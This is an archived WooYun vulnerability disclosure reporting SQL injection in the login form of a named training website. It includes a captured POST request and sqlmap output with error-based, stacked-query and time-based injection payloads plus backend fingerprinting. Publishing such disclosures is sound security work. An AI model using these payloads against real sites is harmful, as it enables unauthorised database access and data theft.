乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-23: 细节已通知厂商并且等待厂商处理中 2015-11-28: 厂商已经主动忽略漏洞,细节向公众公开
http://bzwsw.91huayi.com/Page/MainPage.aspx
登录框处
POST /default_2.aspx HTTP/1.1Host: hy.91huayi.comUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:42.0) Gecko/20100101 Firefox/42.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://hy.91huayi.com/default_2.aspxCookie: ASP.NET_SessionId=rw1l2r553hac2mioxniybtyqConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 285__EVENTTARGET=Button1&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE3MTg0OTYyNDVkZB9Jv2PMjfRLTpw7hsjLBDOy0TcE&txtUser=aaa&txtPwd=aaaa&txtYzm=39822&__EVENTVALIDATION=%2FwEWCgLg2cD5AgLB2tiHDgKd%2B7qdDgKS%2B%2BqbCwKM54rGBgL%2B26HhBQLM9PumDwKxi96RBQKWosD8CgL7uKJneRO9RxKAz1G78ZKJkINQFKmltyY%3D
sqlmap resumed the following injection point(s) from stored session:---Parameter: txtUser (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __EVENTTARGET=Button1&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTE3MTg0OTYyNDVkZB9Jv2PMjfRLTpw7hsjLBDOy0TcE&txtUser=aaa' AND 6981=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (6981=6981) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(112)+CHAR(113))) AND 'jbKT'='jbKT&txtPwd=aaaa&txtYzm=39822&__EVENTVALIDATION=/wEWCgLg2cD5AgLB2tiHDgKd+7qdDgKS++qbCwKM54rGBgL+26HhBQLM9PumDwKxi96RBQKWosD8CgL7uKJneRO9RxKAz1G78ZKJkINQFKmltyY= Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: __EVENTTARGET=Button1&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTE3MTg0OTYyNDVkZB9Jv2PMjfRLTpw7hsjLBDOy0TcE&txtUser=aaa';WAITFOR DELAY '0:0:5'--&txtPwd=aaaa&txtYzm=39822&__EVENTVALIDATION=/wEWCgLg2cD5AgLB2tiHDgKd+7qdDgKS++qbCwKM54rGBgL+26HhBQLM9PumDwKxi96RBQKWosD8CgL7uKJneRO9RxKAz1G78ZKJkINQFKmltyY= Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: __EVENTTARGET=Button1&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTE3MTg0OTYyNDVkZB9Jv2PMjfRLTpw7hsjLBDOy0TcE&txtUser=aaa' WAITFOR DELAY '0:0:5'--&txtPwd=aaaa&txtYzm=39822&__EVENTVALIDATION=/wEWCgLg2cD5AgLB2tiHDgKd+7qdDgKS++qbCwKM54rGBgL+26HhBQLM9PumDwKxi96RBQKWosD8CgL7uKJneRO9RxKAz1G78ZKJkINQFKmltyY=---[00:12:20] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[00:12:20] [INFO] testing if current user is DBAcurrent user is DBA: False
测试的过程中竟然修复了,好神奇。
危害等级:无影响厂商忽略
忽略时间:2015-11-28 13:50
漏洞Rank:2 (WooYun评价)
暂无